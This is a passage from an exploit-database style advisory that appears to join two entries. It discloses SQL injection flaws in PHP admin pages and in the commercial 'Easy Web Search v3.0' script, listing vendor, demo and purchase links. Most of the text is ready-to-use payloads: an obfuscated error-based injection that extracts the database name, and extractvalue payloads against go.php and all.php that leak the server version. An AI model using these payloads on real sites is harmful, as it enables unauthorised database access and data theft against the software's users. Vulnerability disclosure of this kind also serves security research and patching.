# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
# http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Easy Web Search - PHP Search Engine with Image Search and Crawling System Script v3.0 - SQL Injection
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
# Demo: http://demos.nelliwinne.net/EasyWebSearchDev/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/go.php?id=[SQL]
# 99999'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/all.php?q=&stt=[SQL]
# 99999+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc....Other files have vulnerabilities ...
# # # # #